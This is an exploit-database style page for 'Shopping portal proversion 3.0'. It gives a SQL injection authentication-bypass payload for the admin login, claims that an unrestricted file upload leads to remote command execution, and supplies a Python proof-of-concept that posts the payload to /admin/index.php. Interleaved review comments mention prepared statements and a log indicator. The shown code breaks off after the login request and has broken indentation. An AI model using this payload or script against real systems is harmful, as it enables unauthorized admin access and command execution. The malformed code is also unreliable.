Exploits / Vulnerability Discovered : 2020-01-01 |
Type : webapps |
Platform : php
This exploit / vulnerability, Shopping portal proversion 3.0 authentication bypass, is published for educational purposes only; if you use it, you do so at your own risk!
# Description:
# The username and password parameters of the admin panel login are vulnerable to SQL injection.
# username: joke' or '1'='1'# , password: joke' or '1'='1'#
# Also, the "Insert Product" section places no restriction on uploading malicious files.
# Together, these two vulnerabilities allow unauthenticated remote command execution.
#!/usr/bin/python
import requests
import sys
import urllib
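# Argument handling: exactly two arguments are expected (target host/path and
# a command string). Any other count, or "-h" as the first argument, prints
# the usage text and stops.
if len(sys.argv) != 3 or sys.argv[1] == "-h":
    # Single-argument print(...) calls, consistent with the print(...) calls
    # used further down in this script.
    print("[*] Usage: PoC.py rhost/rpath command")
    print("[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig")
    # sys.exit() instead of the site-provided exit() helper, which is meant
    # for interactive use and is not guaranteed to exist; same exit status 0.
    sys.exit(0)

rhost = sys.argv[1]
# Stored for a later step; not referenced in the lines visible here.
command = sys.argv[2]

# Admin login endpoint of the application, addressed over plain HTTP.
url = "http://" + rhost + "/admin/index.php"

# Form fields for the admin login. Both credentials carry the string given in
# the description: a closing quote, an always-true OR condition, and a "#"
# that comments out the rest of the statement.
# NOTE(review): the server-side code is not shown; this presumably works
# because the login query is assembled from these fields as text. Binding
# username and password as parameters of a prepared statement removes the
# issue. For detection, a POST to /admin/index.php whose username or password
# contains a quote followed by "or" and a trailing "#" is a log/WAF indicator.
data = {
    "username": "joke' or '1'='1'#",
    "password": "joke' or '1'='1'#",
    "submit": "",
}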
with requests.Session() as session:
#login
lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
print ("[*] Status code for login: %s"%lg.status_code)
if lg.status_code != 200:
print ("One bad day! Check web application path!")
sys.exit()